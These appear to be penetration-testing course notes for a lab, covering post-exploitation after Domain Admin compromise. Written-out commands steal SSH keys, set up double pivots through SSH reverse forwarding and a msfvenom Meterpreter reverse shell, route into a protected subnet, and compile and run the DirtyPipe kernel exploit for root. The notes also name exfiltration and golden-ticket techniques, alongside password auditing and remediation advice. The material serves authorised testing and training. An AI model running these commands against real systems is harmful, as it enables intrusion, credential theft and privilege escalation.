Post-Exploitation activities maximize assessment value after achieving Domain Administrator access. Perform domain password analysis, establish double pivoting for protected networks, exploit kernel vulnerabilities, and demonstrate comprehensive impact through systematic post-compromise enumeration and additional security assessments.
# Complete credential extraction results:
- Total password hashes obtained: [COUNT]
- Password hashes successfully cracked: [COUNT]
- Percentage of passwords cracked: [PERCENTAGE]%
- Domain Admin passwords cracked: [COUNT]
- Enterprise Admin passwords cracked: [COUNT]
# DPAT analysis tool usage:
python dpat.py -n ntds_hashes.txt -c cracked_passwords.txt
# Output: Comprehensive password statistics and visualizations# Common password patterns discovered:
- Top 10 most common passwords
- Password length distribution analysis
- Keyboard walk patterns (12qwaszx, etc.)
- Seasonal password variations
- Company-specific password themes
# Security recommendations:
- Implement stronger password complexity requirements
- Deploy password blacklisting solutions
- Increase minimum password length requirements
- Implement regular password rotation policies# Comprehensive AD security analysis
PingCastle.exe --healthcheck --server DC01.INLANEFREIGHT.LOCAL
# Key areas analyzed:
- Privileged account security
- Group membership configurations
- Trust relationship security
- Certificate authority configuration
- GPO security settings
- Kerberos configuration analysis
# Report integration:
- Include PingCastle findings in appendices
- Translate technical findings to business impact
- Provide prioritized remediation roadmap# Best practice recommendations:
- Excessive privilege identification
- Stale account discovery
- Service account analysis
- GPO security review
- Trust relationship assessment
- Certificate template analysis# Target: 172.16.9.0/23 subnet (management network)
# Goal: Access "crown jewels" servers
# Challenge: Should not be directly accessible from principal domain
# Network topology:
Attack Host → dmz01 (172.16.8.120) → DC01 (172.16.9.3) → MGMT01 (172.16.9.25)# SSH private key location:
C:\Department Shares\IT\Private\Networking\
# Available keys:
ssmallsadm-id_rsa # Management network access
[other_user]-id_rsa # Additional network access
[admin_user]-id_rsa # Privileged access keys
# Key extraction via Evil-WinRM:
download "C:\Department Shares\IT\Private\Networking\ssmallsadm-id_rsa" ./ssmallsadm-key# Phase 1: SSH Local Port Forwarding (Attack → DMZ01)
ssh -i id_rsa -L 5985:172.16.8.3:5985 root@DMZ01_IP
# Result: Local WinRM access to DC01
# Phase 2: SSH Reverse Port Forwarding (DMZ01 → Attack)
ssh -i id_rsa -R 1234:ATTACK_IP:8443 root@DMZ01_IP
# Result: Reverse tunnel for DC01 → Attack host communication
# Phase 3: Meterpreter Payload Chain
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.8.120 LPORT=1234 -f exe -o dc_shell.exe
# Target: DMZ01 internal interface, tunneled to attack host# Multi/handler setup
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 8443
run
# DC01 payload execution
.\dc_shell.exe
# Result: Meterpreter session through double tunnel
# Route addition for management network
run autoroute -s 172.16.9.0/23
# Result: Direct access to protected subnet
# SOCKS proxy establishment
use auxiliary/server/socks_proxy
set SRVPORT 9050
set VERSION 4a
run
# Result: ProxyChains access to 172.16.9.0/23# Management network connectivity test
proxychains nmap -sT -p 22 172.16.9.25
# Result: SSH service accessible
# SSH key authentication
chmod 600 ssmallsadm-key
proxychains ssh -i ssmallsadm-key ssmallsadm@172.16.9.25
# Successful access:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.10.0-051000-generic x86_64)
ssmallsadm@MGMT01:~$# Kernel version analysis
uname -a
# Output: Linux MGMT01 5.10.0-051000-generic #202012132330 SMP
# Vulnerability research:
CVE-2022-0847 (DirtyPipe) - Kernel 5.10.0 vulnerable
# Impact: Local privilege escalation to root
# SUID binary enumeration
find / -perm -4000 2>/dev/null
# Target: /usr/lib/openssh/ssh-keysign# Exploit acquisition
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cat exploit-2.c # Copy exploit code
# Target system compilation
vim exploit.c # Paste exploit code
gcc exploit.c -o dirtypipe
chmod +x dirtypipe
# SUID binary exploitation
./dirtypipe /usr/lib/openssh/ssh-keysign
# Expected output:
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# Root access verification:
# id
uid=0(root) gid=0(root) groups=0(root),1001(ssmallsadm)# Achievement summary:
- Protected network access achieved
- Management server root compromise
- "Crown jewels" server access demonstrated
- Complete network segmentation bypass
# Impact demonstration:
- Access to sensitive management infrastructure
- Potential for additional network discovery
- Complete enterprise environment compromise# File share enumeration with Domain Admin access
*Evil-WinRM* PS C:\> cd "C:\Department Shares"
*Evil-WinRM* PS C:\Department Shares> dir
# High-value targets:
Accounting/ # Financial data access
Executives/ # Executive communications
Finance/ # Budget and financial planning
HR/ # Employee personal information
R&D/ # Intellectual property and research
# Evidence collection:
- Screenshot file listings (do not open individual files)
- Document access capabilities
- Assess data classification requirements# DLP capability assessment (with client approval):
- Test various exfiltration methods
- Evaluate detection capabilities
- Use mock data only (no real sensitive data)
- Document detection/prevention results
# Common exfiltration vectors:
- Email attachments
- Cloud storage uploads
- DNS tunneling
- Encrypted channels
- USB device simulation# Trust relationship analysis:
- Child → Parent domain trusts
- Intra-forest trust relationships
- External forest trusts
- Cross-domain privilege escalation
# Attack scenarios:
- Kerberoasting across trusts
- Golden ticket attacks
- Inter-domain privilege escalation
- Partner domain compromise impact# Quantitative metrics:
- Total hosts compromised: [COUNT]
- Credential pairs discovered: [COUNT]
- Critical vulnerabilities identified: [COUNT]
- Network segments accessed: [COUNT]
- Data repositories accessible: [COUNT]
# Qualitative impact:
- Business process disruption potential
- Intellectual property exposure risk
- Financial data access capabilities
- Regulatory compliance implications# Business impact demonstration:
- Complete network infrastructure access
- Sensitive data repository compromise
- Management network segmentation bypass
- Crown jewels server access achievement
# Risk prioritization:
- Immediate remediation requirements
- Short-term security improvements
- Long-term strategic recommendations
- Compliance and regulatory considerations# Lab 1: Management Network Access
1. Double pivot setup → SSH + Metasploit routing
2. SSH key discovery → Department Shares enumeration
3. Protected network access → 172.16.9.25 connectivity
4. Management server access → ssmallsadm authentication
5. Flag retrieval → User home directory
# Lab 2: Root Privilege Escalation
1. Kernel vulnerability identification → CVE-2022-0847
2. DirtyPipe exploit compilation → gcc exploit.c
3. SUID binary exploitation → ssh-keysign hijacking
4. Root shell acquisition → uid=0 access
5. Flag retrieval → /root/flag.txt# Complex pivoting:
- Multi-hop network traversal
- Reverse port forwarding chains
- Metasploit routing integration
- ProxyChains tunnel management
# Post-compromise value:
- Comprehensive domain analysis
- Protected network access
- Kernel exploitation techniques
- Professional impact demonstration# Segmentation improvements:
- Implement proper network isolation
- Deploy next-generation firewalls
- Restrict management network access
- Monitor inter-segment communication
# Access controls:
- Implement privileged access management
- Deploy jump boxes for administrative access
- Restrict direct domain admin access
- Implement just-in-time administration# Monitoring enhancements:
- Deploy advanced threat detection
- Implement network traffic analysis
- Monitor privileged account usage
- Deploy endpoint detection and response
# Incident response:
- Develop compromise detection procedures
- Implement automated response capabilities
- Regular security assessment programs
- Continuous security monitoring# External → Domain Admin → Protected Network Root:
Phase 1: External reconnaissance and web application testing
Phase 2: Initial access via command injection and privilege escalation
Phase 3: Internal network pivoting and credential harvesting
Phase 4: Lateral movement and Active Directory enumeration
Phase 5: Domain compromise via targeted Kerberoasting and DCSync
Phase 6: Protected network access and kernel exploitation
# Total impact:
- Complete enterprise network compromise
- All network segments accessed
- Sensitive data repositories compromised
- Management infrastructure controlled# Client deliverables:
- Comprehensive vulnerability assessment
- Complete attack path documentation
- Detailed remediation recommendations
- Executive summary with business impact
- Technical appendices with evidence
- Password analysis and recommendations
# Above-and-beyond value:
- Active Directory security audit
- Protected network assessment
- Data classification review
- Trust relationship analysis
- Compliance gap identification